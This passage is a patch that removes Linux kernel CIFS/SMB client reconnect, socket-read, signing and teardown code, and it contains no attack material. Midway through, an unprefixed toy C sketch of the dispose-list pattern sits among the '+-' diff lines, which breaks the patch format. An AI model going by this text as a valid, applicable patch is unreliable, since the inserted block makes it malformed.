+- * @server needs to be previously set to CifsNeedReconnect.
+- * @mark_smb_session: whether even sessions need to be marked
+- */
+-void
+-cifs_mark_tcp_ses_conns_for_reconnect(struct TCP_Server_Info *server,
+-				      bool mark_smb_session)
+-{
+-	struct TCP_Server_Info *pserver;
+-	struct cifs_ses *ses, *nses;
+-	struct cifs_tcon *tcon;
+-
+-	/*
+-	 * before reconnecting the tcp session, mark the smb session (uid) and the tid bad so they
+-	 * are not used until reconnected.
+-	 */
+-	cifs_dbg(FYI, "%s: marking necessary sessions and tcons for reconnect\n", __func__);
+-
+-	/* If server is a channel, select the primary channel */
+-	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
+-
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry_safe(ses, nses, &pserver->smb_ses_list, smb_ses_list) {
+-		/* check if iface is still active */
+-		if (!cifs_chan_is_iface_active(ses, server))
+-			cifs_chan_update_iface(ses, server);
+-
+-		spin_lock(&ses->chan_lock);
+-		if (!mark_smb_session && cifs_chan_needs_reconnect(ses, server)) {
+-			spin_unlock(&ses->chan_lock);
+-			continue;
+-		}
+-
+-		if (mark_smb_session)
+-			CIFS_SET_ALL_CHANS_NEED_RECONNECT(ses);
+-		else
+-			cifs_chan_set_need_reconnect(ses, server);
+-
+-		cifs_dbg(FYI, "%s: channel connect bitmap: 0x%lx\n",
+-			 __func__, ses->chans_need_reconnect);
+-
+-		/* If all channels need reconnect, then tcon needs reconnect */
+-		if (!mark_smb_session && !CIFS_ALL_CHANS_NEED_RECONNECT(ses)) {
+-			spin_unlock(&ses->chan_lock);
+-			continue;
+-		}
+-		spin_unlock(&ses->chan_lock);
+-
+-		spin_lock(&ses->ses_lock);
+-		ses->ses_status = SES_NEED_RECON;
+-		spin_unlock(&ses->ses_lock);
+-
+-		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+-			tcon->need_reconnect = true;
+-			spin_lock(&tcon->tc_lock);
+-			tcon->status = TID_NEED_RECON;
+-			spin_unlock(&tcon->tc_lock);
+-		}
+-		if (ses->tcon_ipc) {
+-			ses->tcon_ipc->need_reconnect = true;
+-			spin_lock(&ses->tcon_ipc->tc_lock);
+-			ses->tcon_ipc->status = TID_NEED_RECON;
+-			spin_unlock(&ses->tcon_ipc->tc_lock);
+-		}
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-}
+-
+-static void
+-cifs_abort_connection(struct TCP_Server_Info *server)
+-{
+-	struct mid_q_entry *mid, *nmid;
+-	struct list_head retry_list;
+-
+-	server->maxBuf = 0;
+-	server->max_read = 0;
+-
+-	/* do not want to be sending data on a socket we are freeing */
+-	cifs_dbg(FYI, "%s: tearing down socket\n", __func__);
+-	cifs_server_lock(server);
+-	if (server->ssocket) {
+-		cifs_dbg(FYI, "State: 0x%x Flags: 0x%lx\n", server->ssocket->state,
+-			 server->ssocket->flags);
+-		kernel_sock_shutdown(server->ssocket, SHUT_WR);
+-		cifs_dbg(FYI, "Post shutdown state: 0x%x Flags: 0x%lx\n", server->ssocket->state,
+-			 server->ssocket->flags);
+-		sock_release(server->ssocket);
+-		server->ssocket = NULL;
+-	}
+-	server->sequence_number = 0;
+-	server->session_estab = false;
+-	kfree_sensitive(server->session_key.response);
+-	server->session_key.response = NULL;
+-	server->session_key.len = 0;
+-	server->lstrp = jiffies;
+-
+-	/* mark submitted MIDs for retry and issue callback */
+-	INIT_LIST_HEAD(&retry_list);
+-	cifs_dbg(FYI, "%s: moving mids to private list\n", __func__);
+-	spin_lock(&server->mid_lock);
+-	list_for_each_entry_safe(mid, nmid, &server->pending_mid_q, qhead) {
+-		kref_get(&mid->refcount);
+-		if (mid->mid_state == MID_REQUEST_SUBMITTED)
+-			mid->mid_state = MID_RETRY_NEEDED;
+-		list_move(&mid->qhead, &retry_list);
+-		mid->mid_flags |= MID_DELETED;
+-	}
+-	spin_unlock(&server->mid_lock);
+-	cifs_server_unlock(server);
+-
+-	cifs_dbg(FYI, "%s: issuing mid callbacks\n", __func__);
+-	list_for_each_entry_safe(mid, nmid, &retry_list, qhead) {
+-		list_del_init(&mid->qhead);
+-		mid->callback(mid);
+-		release_mid(mid);
+-	}
+-
+-	if (cifs_rdma_enabled(server)) {
+-		cifs_server_lock(server);
+-		smbd_destroy(server);
+-		cifs_server_unlock(server);
+-	}
+-}
+-
+-static bool cifs_tcp_ses_needs_reconnect(struct TCP_Server_Info *server, int num_targets)
+-{
+-	spin_lock(&server->srv_lock);
+-	server->nr_targets = num_targets;
+-	if (server->tcpStatus == CifsExiting) {
+-		/* the demux thread will exit normally next time through the loop */
+-		spin_unlock(&server->srv_lock);
+-		wake_up(&server->response_q);
+-		return false;
+-	}
+-
+-	cifs_dbg(FYI, "Mark tcp session as need reconnect\n");
+-	trace_smb3_reconnect(server->CurrentMid, server->conn_id,
+-			     server->hostname);
+-	server->tcpStatus = CifsNeedReconnect;
+-
+-	spin_unlock(&server->srv_lock);
+-	return true;
+-}
+-
+-/*
+- * cifs tcp session reconnection
+- *
+- * mark tcp session as reconnecting so temporarily locked
+- * mark all smb sessions as reconnecting for tcp session
+- * reconnect tcp session
+- * wake up waiters on reconnection? - (not needed currently)
+- *
+- * if mark_smb_session is passed as true, unconditionally mark
+- * the smb session (and tcon) for reconnect as well. This value
+- * doesn't really matter for non-multichannel scenario.
+- *
+- */
+-static int __cifs_reconnect(struct TCP_Server_Info *server,
+-			    bool mark_smb_session)
+-{
+-	int rc = 0;
+-
+-	if (!cifs_tcp_ses_needs_reconnect(server, 1))
+-		return 0;
+-
+-	cifs_mark_tcp_ses_conns_for_reconnect(server, mark_smb_session);
+-
+-	cifs_abort_connection(server);
+-
+-	do {
+-		try_to_freeze();
+-		cifs_server_lock(server);
+-
+-		if (!cifs_swn_set_server_dstaddr(server)) {
+-			/* resolve the hostname again to make sure that IP address is up-to-date */
+-			rc = reconn_set_ipaddr_from_hostname(server);
+-			cifs_dbg(FYI, "%s: reconn_set_ipaddr_from_hostname: rc=%d\n", __func__, rc);
+-		}
+-
+-		if (cifs_rdma_enabled(server))
+-			rc = smbd_reconnect(server);
+-		else
+-			rc = generic_ip_connect(server);
+-		if (rc) {
+-			cifs_server_unlock(server);
+-			cifs_dbg(FYI, "%s: reconnect error %d\n", __func__, rc);
+-			msleep(3000);
+-		} else {
+-			atomic_inc(&tcpSesReconnectCount);
+-			set_credits(server, 1);
+-			spin_lock(&server->srv_lock);
+-			if (server->tcpStatus != CifsExiting)
+-				server->tcpStatus = CifsNeedNegotiate;
+-			spin_unlock(&server->srv_lock);
+-			cifs_swn_reset_server_dstaddr(server);
+-			cifs_server_unlock(server);
+-			mod_delayed_work(cifsiod_wq, &server->reconnect, 0);
+-		}
+-	} while (server->tcpStatus == CifsNeedReconnect);
+-
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus == CifsNeedNegotiate)
+-		mod_delayed_work(cifsiod_wq, &server->echo, 0);
+-	spin_unlock(&server->srv_lock);
+-
+-	wake_up(&server->response_q);
+-	return rc;
+-}
+-
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-static int __reconnect_target_unlocked(struct TCP_Server_Info *server, const char *target)
+-{
+-	int rc;
+-	char *hostname;
+-
+-	if (!cifs_swn_set_server_dstaddr(server)) {
+-		if (server->hostname != target) {
+-			hostname = extract_hostname(target);
+-			if (!IS_ERR(hostname)) {
+-				spin_lock(&server->srv_lock);
+-				kfree(server->hostname);
+-				server->hostname = hostname;
+-				spin_unlock(&server->srv_lock);
+-			} else {
+-				cifs_dbg(FYI, "%s: couldn't extract hostname or address from dfs target: %ld\n",
+-					 __func__, PTR_ERR(hostname));
+-				cifs_dbg(FYI, "%s: default to last target server: %s\n", __func__,
+-					 server->hostname);
+-			}
+-		}
+-		/* resolve the hostname again to make sure that IP address is up-to-date. */
+-		rc = reconn_set_ipaddr_from_hostname(server);
+-		cifs_dbg(FYI, "%s: reconn_set_ipaddr_from_hostname: rc=%d\n", __func__, rc);
+-	}
+-	/* Reconnect the socket */
+-	if (cifs_rdma_enabled(server))
+-		rc = smbd_reconnect(server);
+-	else
+-		rc = generic_ip_connect(server);
+-
+-	return rc;
+-}
+-
+-static int reconnect_target_unlocked(struct TCP_Server_Info *server, struct dfs_cache_tgt_list *tl,
+-				     struct dfs_cache_tgt_iterator **target_hint)
+-{
+-	int rc;
+-	struct dfs_cache_tgt_iterator *tit;
+-
+-	*target_hint = NULL;
+-
+-	/* If dfs target list is empty, then reconnect to last server */
+-	tit = dfs_cache_get_tgt_iterator(tl);
+-	if (!tit)
+-		return __reconnect_target_unlocked(server, server->hostname);
+-
+-	/* Otherwise, try every dfs target in @tl */
+-	for (; tit; tit = dfs_cache_get_next_tgt(tl, tit)) {
+-		rc = __reconnect_target_unlocked(server, dfs_cache_get_tgt_name(tit));
+-		if (!rc) {
+-			*target_hint = tit;
+-			break;
+-		}
+-	}
+-	return rc;
+-}
+-
+-static int reconnect_dfs_server(struct TCP_Server_Info *server)
+-{
+-	int rc = 0;
+-	const char *refpath = server->current_fullpath + 1;
+-	struct dfs_cache_tgt_list tl = DFS_CACHE_TGT_LIST_INIT(tl);
+-	struct dfs_cache_tgt_iterator *target_hint = NULL;
+-	int num_targets = 0;
+-
+-	/*
+-	 * Determine the number of dfs targets the referral path in @cifs_sb resolves to.
+-	 *
+-	 * smb2_reconnect() needs to know how long it should wait based upon the number of dfs
+-	 * targets (server->nr_targets).  It's also possible that the cached referral was cleared
+-	 * through /proc/fs/cifs/dfscache or the target list is empty due to server settings after
+-	 * refreshing the referral, so, in this case, default it to 1.
+-	 */
+-	if (!dfs_cache_noreq_find(refpath, NULL, &tl))
+-		num_targets = dfs_cache_get_nr_tgts(&tl);
+-	if (!num_targets)
+-		num_targets = 1;
+-
+-	if (!cifs_tcp_ses_needs_reconnect(server, num_targets))
+-		return 0;
+-
+-	/*
+-	 * Unconditionally mark all sessions & tcons for reconnect as we might be connecting to a
+-	 * different server or share during failover.  It could be improved by adding some logic to
+-	 * only do that in case it connects to a different server or share, though.
+-	 */
+-	cifs_mark_tcp_ses_conns_for_reconnect(server, true);
+-
+-	cifs_abort_connection(server);
+-
+-	do {
+-		try_to_freeze();
+-		cifs_server_lock(server);
+-
+-		rc = reconnect_target_unlocked(server, &tl, &target_hint);
+-		if (rc) {
+-			/* Failed to reconnect socket */
+-			cifs_server_unlock(server);
+-			cifs_dbg(FYI, "%s: reconnect error %d\n", __func__, rc);
+-			msleep(3000);
+-			continue;
+-		}
+-		/*
+-		 * Socket was created.  Update tcp session status to CifsNeedNegotiate so that a
+-		 * process waiting for reconnect will know it needs to re-establish session and tcon
+-		 * through the reconnected target server.
+-		 */
+-		atomic_inc(&tcpSesReconnectCount);
+-		set_credits(server, 1);
+-		spin_lock(&server->srv_lock);
+-		if (server->tcpStatus != CifsExiting)
+-			server->tcpStatus = CifsNeedNegotiate;
+-		spin_unlock(&server->srv_lock);
+-		cifs_swn_reset_server_dstaddr(server);
+-		cifs_server_unlock(server);
+-		mod_delayed_work(cifsiod_wq, &server->reconnect, 0);
+-	} while (server->tcpStatus == CifsNeedReconnect);
+-
+-	if (target_hint)
+-		dfs_cache_noreq_update_tgthint(refpath, target_hint);
+-
+-	dfs_cache_free_tgts(&tl);
+-
+-	/* Need to set up echo worker again once connection has been established */
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus == CifsNeedNegotiate)
+-		mod_delayed_work(cifsiod_wq, &server->echo, 0);
+-	spin_unlock(&server->srv_lock);
+-
+-	wake_up(&server->response_q);
+-	return rc;
+-}
+-
+-int cifs_reconnect(struct TCP_Server_Info *server, bool mark_smb_session)
+-{
+-	/* If tcp session is not an dfs connection, then reconnect to last target server */
+-	spin_lock(&server->srv_lock);
+-	if (!server->is_dfs_conn) {
+-		spin_unlock(&server->srv_lock);
+-		return __cifs_reconnect(server, mark_smb_session);
+-	}
+-	spin_unlock(&server->srv_lock);
+-
+-	mutex_lock(&server->refpath_lock);
+-	if (!server->origin_fullpath || !server->leaf_fullpath) {
+-		mutex_unlock(&server->refpath_lock);
+-		return __cifs_reconnect(server, mark_smb_session);
+-	}
+-	mutex_unlock(&server->refpath_lock);
+-
+-	return reconnect_dfs_server(server);
+-}
+-#else
+-int cifs_reconnect(struct TCP_Server_Info *server, bool mark_smb_session)
+-{
+-	return __cifs_reconnect(server, mark_smb_session);
+-}
+-#endif
+-
+-static void
+-cifs_echo_request(struct work_struct *work)
+-{
+-	int rc;
+-	struct TCP_Server_Info *server = container_of(work,
+-					struct TCP_Server_Info, echo.work);
+-
+-	/*
+-	 * We cannot send an echo if it is disabled.
+-	 * Also, no need to ping if we got a response recently.
+-	 */
+-
+-	if (server->tcpStatus == CifsNeedReconnect ||
+-	    server->tcpStatus == CifsExiting ||
+-	    server->tcpStatus == CifsNew ||
+-	    (server->ops->can_echo && !server->ops->can_echo(server)) ||
+-	    time_before(jiffies, server->lstrp + server->echo_interval - HZ))
+-		goto requeue_echo;
+-
+-	rc = server->ops->echo ? server->ops->echo(server) : -ENOSYS;
+-	cifs_server_dbg(FYI, "send echo request: rc = %d\n", rc);
+-
+-	/* Check witness registrations */
+-	cifs_swn_check();
+-
+-requeue_echo:
+-	queue_delayed_work(cifsiod_wq, &server->echo, server->echo_interval);
+-}
+-
+-static bool
+-allocate_buffers(struct TCP_Server_Info *server)
+-{
+-	if (!server->bigbuf) {
+-		server->bigbuf = (char *)cifs_buf_get();
+-		if (!server->bigbuf) {
+-			cifs_server_dbg(VFS, "No memory for large SMB response\n");
+-			msleep(3000);
+-			/* retry will check if exiting */
+-			return false;
+-		}
+-	} else if (server->large_buf) {
+-		/* we are reusing a dirty large buf, clear its start */
+-		memset(server->bigbuf, 0, HEADER_SIZE(server));
+-	}
+-
+-	if (!server->smallbuf) {
+-		server->smallbuf = (char *)cifs_small_buf_get();
+-		if (!server->smallbuf) {
+-			cifs_server_dbg(VFS, "No memory for SMB response\n");
+-			msleep(1000);
+-			/* retry will check if exiting */
+-			return false;
+-		}
+-		/* beginning of smb buffer is cleared in our buf_get */
+-	} else {
+-		/* if existing small buf clear beginning */
+-		memset(server->smallbuf, 0, HEADER_SIZE(server));
+-	}
+-
+-	return true;
+-}
+-
+-static bool
+-server_unresponsive(struct TCP_Server_Info *server)
+-{
+-	/*
+-	 * We need to wait 3 echo intervals to make sure we handle such
+-	 * situations right:
+-	 * 1s  client sends a normal SMB request
+-	 * 2s  client gets a response
+-	 * 30s echo workqueue job pops, and decides we got a response recently
+-	 *     and don't need to send another
+-	 * ...
+-	 * 65s kernel_recvmsg times out, and we see that we haven't gotten
+-	 *     a response in >60s.
+-	 */
+-	spin_lock(&server->srv_lock);
+-	if ((server->tcpStatus == CifsGood ||
+-	    server->tcpStatus == CifsNeedNegotiate) &&
+-	    (!server->ops->can_echo || server->ops->can_echo(server)) &&
+-	    time_after(jiffies, server->lstrp + 3 * server->echo_interval)) {
+-		spin_unlock(&server->srv_lock);
+-		cifs_server_dbg(VFS, "has not responded in %lu seconds. Reconnecting...\n",
+-			 (3 * server->echo_interval) / HZ);
+-		cifs_reconnect(server, false);
+-		return true;
+-	}
+-	spin_unlock(&server->srv_lock);
+-
+-	return false;
+-}
+-
+-static inline bool
+-zero_credits(struct TCP_Server_Info *server)
+-{
+-	int val;
+-
+-	spin_lock(&server->req_lock);
+-	val = server->credits + server->echo_credits + server->oplock_credits;
+-	if (server->in_flight == 0 && val == 0) {
+-		spin_unlock(&server->req_lock);
+-		return true;
+-	}
+-	spin_unlock(&server->req_lock);
+-	return false;
+-}
+-
+-static int
+-cifs_readv_from_socket(struct TCP_Server_Info *server, struct msghdr *smb_msg)
+-{
+-	int length = 0;
+-	int total_read;
+-
+-	for (total_read = 0; msg_data_left(smb_msg); total_read += length) {
+-		try_to_freeze();
+-
+-		/* reconnect if no credits and no requests in flight */
+-		if (zero_credits(server)) {
+-			cifs_reconnect(server, false);
+-			return -ECONNABORTED;
+-		}
+-
+-		if (server_unresponsive(server))
+-			return -ECONNABORTED;
+-		if (cifs_rdma_enabled(server) && server->smbd_conn)
+-			length = smbd_recv(server->smbd_conn, smb_msg);
+-		else
+-			length = sock_recvmsg(server->ssocket, smb_msg, 0);
+-
+-		spin_lock(&server->srv_lock);
+-		if (server->tcpStatus == CifsExiting) {
+-			spin_unlock(&server->srv_lock);
+-			return -ESHUTDOWN;
+-		}
+-
+-		if (server->tcpStatus == CifsNeedReconnect) {
+-			spin_unlock(&server->srv_lock);
+-			cifs_reconnect(server, false);
+-			return -ECONNABORTED;
+-		}
+-		spin_unlock(&server->srv_lock);
+-
+-		if (length == -ERESTARTSYS ||
+-		    length == -EAGAIN ||
+-		    length == -EINTR) {
+-			/*
+-			 * Minimum sleep to prevent looping, allowing socket
+-			 * to clear and app threads to set tcpStatus
+-			 * CifsNeedReconnect if server hung.
+-			 */
+-			usleep_range(1000, 2000);
+-			length = 0;
+-			continue;
+-		}
+-
+-		if (length <= 0) {
+-			cifs_dbg(FYI, "Received no data or error: %d\n", length);
+-			cifs_reconnect(server, false);
+-			return -ECONNABORTED;
+-		}
+-	}
+-	return total_read;
+-}
+-
+-int
+-cifs_read_from_socket(struct TCP_Server_Info *server, char *buf,
+-		      unsigned int to_read)
+-{
+-	struct msghdr smb_msg = {};
+-	struct kvec iov = {.iov_base = buf, .iov_len = to_read};
+-	iov_iter_kvec(&smb_msg.msg_iter, ITER_DEST, &iov, 1, to_read);
+-
+-	return cifs_readv_from_socket(server, &smb_msg);
+-}
+-
+-ssize_t
+-cifs_discard_from_socket(struct TCP_Server_Info *server, size_t to_read)
+-{
+-	struct msghdr smb_msg = {};
+-
+-	/*
+-	 *  iov_iter_discard already sets smb_msg.type and count and iov_offset
+-	 *  and cifs_readv_from_socket sets msg_control and msg_controllen
+-	 *  so little to initialize in struct msghdr
+-	 */
+-	iov_iter_discard(&smb_msg.msg_iter, ITER_DEST, to_read);
+-
+-	return cifs_readv_from_socket(server, &smb_msg);
+-}
+-
+-int
+-cifs_read_page_from_socket(struct TCP_Server_Info *server, struct page *page,
+-	unsigned int page_offset, unsigned int to_read)
+-{
+-	struct msghdr smb_msg = {};
+-	struct bio_vec bv = {
+-		.bv_page = page, .bv_len = to_read, .bv_offset = page_offset};
+-	iov_iter_bvec(&smb_msg.msg_iter, ITER_DEST, &bv, 1, to_read);
+-	return cifs_readv_from_socket(server, &smb_msg);
+-}
+-
+-static bool
+-is_smb_response(struct TCP_Server_Info *server, unsigned char type)
+-{
+-	/*
+-	 * The first byte big endian of the length field,
+-	 * is actually not part of the length but the type
+-	 * with the most common, zero, as regular data.
+-	 */
+-	switch (type) {
+-	case RFC1002_SESSION_MESSAGE:
+-		/* Regular SMB response */
+-		return true;
+-	case RFC1002_SESSION_KEEP_ALIVE:
+-		cifs_dbg(FYI, "RFC 1002 session keep alive\n");
+-		break;
+-	case RFC1002_POSITIVE_SESSION_RESPONSE:
+-		cifs_dbg(FYI, "RFC 1002 positive session response\n");
+-		break;
+-	case RFC1002_NEGATIVE_SESSION_RESPONSE:
+-		/*
+-		 * We get this from Windows 98 instead of an error on
+-		 * SMB negprot response.
+-		 */
+-		cifs_dbg(FYI, "RFC 1002 negative session response\n");
+-		/* give server a second to clean up */
+-		msleep(1000);
+-		/*
+-		 * Always try 445 first on reconnect since we get NACK
+-		 * on some if we ever connected to port 139 (the NACK
+-		 * is since we do not begin with RFC1001 session
+-		 * initialize frame).
+-		 */
+-		cifs_set_port((struct sockaddr *)&server->dstaddr, CIFS_PORT);
+-		cifs_reconnect(server, true);
+-		break;
+-	default:
+-		cifs_server_dbg(VFS, "RFC 1002 unknown response type 0x%x\n", type);
+-		cifs_reconnect(server, true);
+-	}
+-
+-	return false;
+-}
+-
+-void
+-dequeue_mid(struct mid_q_entry *mid, bool malformed)
+-{
+-#ifdef CONFIG_CIFS_STATS2
+-	mid->when_received = jiffies;
+-#endif
+-	spin_lock(&mid->server->mid_lock);
+-	if (!malformed)
+-		mid->mid_state = MID_RESPONSE_RECEIVED;
+-	else
+-		mid->mid_state = MID_RESPONSE_MALFORMED;
+-	/*
+-	 * Trying to handle/dequeue a mid after the send_recv()
+-	 * function has finished processing it is a bug.
+-	 */
+-	if (mid->mid_flags & MID_DELETED) {
+-		spin_unlock(&mid->server->mid_lock);
+-		pr_warn_once("trying to dequeue a deleted mid\n");
+-	} else {
+-		list_del_init(&mid->qhead);
+-		mid->mid_flags |= MID_DELETED;
+-		spin_unlock(&mid->server->mid_lock);
+-	}
+-}
+-
+-static unsigned int
+-smb2_get_credits_from_hdr(char *buffer, struct TCP_Server_Info *server)
+-{
+-	struct smb2_hdr *shdr = (struct smb2_hdr *)buffer;
+-
+-	/*
+-	 * SMB1 does not use credits.
+-	 */
+-	if (is_smb1(server))
+-		return 0;
+-
+-	return le16_to_cpu(shdr->CreditRequest);
+-}
+-
+-static void
+-handle_mid(struct mid_q_entry *mid, struct TCP_Server_Info *server,
+-	   char *buf, int malformed)
+-{
+-	if (server->ops->check_trans2 &&
+-	    server->ops->check_trans2(mid, server, buf, malformed))
+-		return;
+-	mid->credits_received = smb2_get_credits_from_hdr(buf, server);
+-	mid->resp_buf = buf;
+-	mid->large_buf = server->large_buf;
+-	/* Was previous buf put in mpx struct for multi-rsp? */
+-	if (!mid->multiRsp) {
+-		/* smb buffer will be freed by user thread */
+-		if (server->large_buf)
+-			server->bigbuf = NULL;
+-		else
+-			server->smallbuf = NULL;
+-	}
+-	dequeue_mid(mid, malformed);
+-}
+-
+-int
+-cifs_enable_signing(struct TCP_Server_Info *server, bool mnt_sign_required)
+-{
+-	bool srv_sign_required = server->sec_mode & server->vals->signing_required;
+-	bool srv_sign_enabled = server->sec_mode & server->vals->signing_enabled;
+-	bool mnt_sign_enabled;
+-
+-	/*
+-	 * Is signing required by mnt options? If not then check
+-	 * global_secflags to see if it is there.
+-	 */
+-	if (!mnt_sign_required)
+-		mnt_sign_required = ((global_secflags & CIFSSEC_MUST_SIGN) ==
+-						CIFSSEC_MUST_SIGN);
+-
+-	/*
+-	 * If signing is required then it's automatically enabled too,
+-	 * otherwise, check to see if the secflags allow it.
+-	 */
+-	mnt_sign_enabled = mnt_sign_required ? mnt_sign_required :
+-				(global_secflags & CIFSSEC_MAY_SIGN);
+-
+-	/* If server requires signing, does client allow it? */
+-	if (srv_sign_required) {
+-		if (!mnt_sign_enabled) {
+-			cifs_dbg(VFS, "Server requires signing, but it's disabled in SecurityFlags!\n");
+-			return -EOPNOTSUPP;
+-		}
+-		server->sign = true;
+-	}
+-
+-	/* If client requires signing, does server allow it? */
+-	if (mnt_sign_required) {
+-		if (!srv_sign_enabled) {
+-			cifs_dbg(VFS, "Server does not support signing!\n");
+-			return -EOPNOTSUPP;
+-		}
+-		server->sign = true;
+-	}
+-
+-	if (cifs_rdma_enabled(server) && server->sign)
+-		cifs_dbg(VFS, "Signing is enabled, and RDMA read/write will be disabled\n");
+-
+-	return 0;
+-}
+-
+-
+-static void clean_demultiplex_info(struct TCP_Server_Info *server)
+-{
+-	int length;
+-
+-	/* take it off the list, if it's not already */
+-	spin_lock(&server->srv_lock);
+-	list_del_init(&server->tcp_ses_list);
+-	spin_unlock(&server->srv_lock);
+-
+-	cancel_delayed_work_sync(&server->echo);
+-	cancel_delayed_work_sync(&server->resolve);
+-
+-	spin_lock(&server->srv_lock);
+-	server->tcpStatus = CifsExiting;
+-	spin_unlock(&server->srv_lock);
+-	wake_up_all(&server->response_q);
+-
+-	/* check if we have blocked requests that need to free */
+-	spin_lock(&server->req_lock);
+-	if (server->credits <= 0)
+-		server->credits = 1;
+-	spin_unlock(&server->req_lock);
+-	/*
+-	 * Although there should not be any requests blocked on this queue it
+-	 * can not hurt to be paranoid and try to wake up requests that may
+-	 * haven been blocked when more than 50 at time were on the wire to the
+-	 * same server - they now will see the session is in exit state and get
+-	 * out of SendReceive.
+-	 */
+-	wake_up_all(&server->request_q);
+-	/* give those requests time to exit */
+-	msleep(125);
+-	if (cifs_rdma_enabled(server))
+-		smbd_destroy(server);
+-	if (server->ssocket) {
+-		sock_release(server->ssocket);
+-		server->ssocket = NULL;
+-	}
+-
+-	if (!list_empty(&server->pending_mid_q)) {
+-		struct list_head dispose_list;
+-		struct mid_q_entry *mid_entry;
+-		struct list_head *tmp, *tmp2;
+-
+-		INIT_LIST_HEAD(&dispose_list);
+-		spin_lock(&server->mid_lock);
+-		list_for_each_safe(tmp, tmp2, &server->pending_mid_q) {
+-			mid_entry = list_entry(tmp, struct mid_q_entry, qhead);
+-			cifs_dbg(FYI, "Clearing mid %llu\n", mid_entry->mid);
+-			kref_get(&mid_entry->refcount);
+-			mid_entry->mid_state = MID_SHUTDOWN;
+-			list_move(&mid_entry->qhead, &dispose_list);
+-			mid_entry->mid_flags |= MID_DELETED;
+-		}
+-		spin_unlock(&server->mid_lock);
+-
+-		/* now walk dispose list and issue callbacks */
+-		list_for_each_safe(tmp, tmp2, &dispose_list) {
+-			mid_entry = list_entry(tmp, struct mid_q_entry, qhead);
+-			cifs_dbg(FYI, "Callback mid %llu\n", mid_entry->mid);
+-			list_del_init(&mid_entry->qhead);
+-			mid_entry->callback(mid_entry);
+-			release_mid(mid_entry);
+-		}
+-		/* 1/8th of sec is more than enough time for them to exit */
+-		msleep(125);
+-	}
+-
+-	if (!list_empty(&server->pending_mid_q)) {
+-		/*
+-		 * mpx threads have not exited yet; give them at least the smb
+-		 * send timeout for long ops.
+-		 *
+-		 * Due to delays on oplock break requests, we need to wait at
+-		 * least 45 seconds before giving up on a request getting a
+-		 * response and going ahead and killing cifsd.
+-		 */
+-		cifs_dbg(FYI, "Wait for exit from demultiplex thread\n");
+-		msleep(46000);
+-		/*
+-		 * If threads still have not exited, they are probably never
+-		 * coming home; not much else we can do but free the memory.
+-		 */
+-	}
+-
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	kfree(server->origin_fullpath);
+-	kfree(server->leaf_fullpath);
+-#endif
+-	kfree(server);
+-
+-	length = atomic_dec_return(&tcpSesAllocCount);
+-	if (length > 0)
+-		mempool_resize(cifs_req_poolp, length + cifs_min_rcv);
+-}
+-
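/*
 * The dispose-list pattern used by clean_demultiplex_info() above, reduced
 * to its core: detach all pending entries onto a private list while holding
 * the lock, then run the callbacks with the lock dropped so they are free
 * to sleep or take other locks. A sketch with a toy singly-linked list, not
 * the kernel's list helpers.
 */
#include <stddef.h>

struct mid {
	struct mid *next;
	void (*callback)(struct mid *m);
};

void dispose_all(struct mid **pending)
{
	/* step 1: under mid_lock in the real code, detach the whole chain */
	struct mid *list = *pending;
	*pending = NULL;

	/* step 2: lock dropped, safe to invoke callbacks that may sleep */
	while (list) {
		struct mid *m = list;

		list = m->next;
		m->callback(m);
	}
}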
+-static int
+-standard_receive3(struct TCP_Server_Info *server, struct mid_q_entry *mid)
+-{
+-	int length;
+-	char *buf = server->smallbuf;
+-	unsigned int pdu_length = server->pdu_size;
+-
+-	/* make sure this will fit in a large buffer */
+-	if (pdu_length > CIFSMaxBufSize + MAX_HEADER_SIZE(server) -
+-	    HEADER_PREAMBLE_SIZE(server)) {
+-		cifs_server_dbg(VFS, "SMB response too long (%u bytes)\n", pdu_length);
+-		cifs_reconnect(server, true);
+-		return -ECONNABORTED;
+-	}
+-
+-	/* switch to large buffer if too big for a small one */
+-	if (pdu_length > MAX_CIFS_SMALL_BUFFER_SIZE - 4) {
+-		server->large_buf = true;
+-		memcpy(server->bigbuf, buf, server->total_read);
+-		buf = server->bigbuf;
+-	}
+-
+-	/* now read the rest */
+-	length = cifs_read_from_socket(server, buf + HEADER_SIZE(server) - 1,
+-				       pdu_length - MID_HEADER_SIZE(server));
+-
+-	if (length < 0)
+-		return length;
+-	server->total_read += length;
+-
+-	dump_smb(buf, server->total_read);
+-
+-	return cifs_handle_standard(server, mid);
+-}
+-
+-int
+-cifs_handle_standard(struct TCP_Server_Info *server, struct mid_q_entry *mid)
+-{
+-	char *buf = server->large_buf ? server->bigbuf : server->smallbuf;
+-	int rc;
+-
+-	/*
+-	 * We know that we received enough to get to the MID as we
+-	 * checked the pdu_length earlier. Now check to see
+-	 * if the rest of the header is OK.
+-	 *
+-	 * 48 bytes is enough to display the header and a little bit
+-	 * into the payload for debugging purposes.
+-	 */
+-	rc = server->ops->check_message(buf, server->total_read, server);
+-	if (rc)
+-		cifs_dump_mem("Bad SMB: ", buf,
+-			min_t(unsigned int, server->total_read, 48));
+-
+-	if (server->ops->is_session_expired &&
+-	    server->ops->is_session_expired(buf)) {
+-		cifs_reconnect(server, true);
+-		return -1;
+-	}
+-
+-	if (server->ops->is_status_pending &&
+-	    server->ops->is_status_pending(buf, server))
+-		return -1;
+-
+-	if (!mid)
+-		return rc;
+-
+-	handle_mid(mid, server, buf, rc);
+-	return 0;
+-}
+-
+-static void
+-smb2_add_credits_from_hdr(char *buffer, struct TCP_Server_Info *server)
+-{
+-	struct smb2_hdr *shdr = (struct smb2_hdr *)buffer;
+-	int scredits, in_flight;
+-
+-	/*
+-	 * SMB1 does not use credits.
+-	 */
+-	if (is_smb1(server))
+-		return;
+-
+-	if (shdr->CreditRequest) {
+-		spin_lock(&server->req_lock);
+-		server->credits += le16_to_cpu(shdr->CreditRequest);
+-		scredits = server->credits;
+-		in_flight = server->in_flight;
+-		spin_unlock(&server->req_lock);
+-		wake_up(&server->request_q);
+-
+-		trace_smb3_hdr_credits(server->CurrentMid,
+-				server->conn_id, server->hostname, scredits,
+-				le16_to_cpu(shdr->CreditRequest), in_flight);
+-		cifs_server_dbg(FYI, "%s: added %u credits total=%d\n",
+-				__func__, le16_to_cpu(shdr->CreditRequest),
+-				scredits);
+-	}
+-}
+-
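/*
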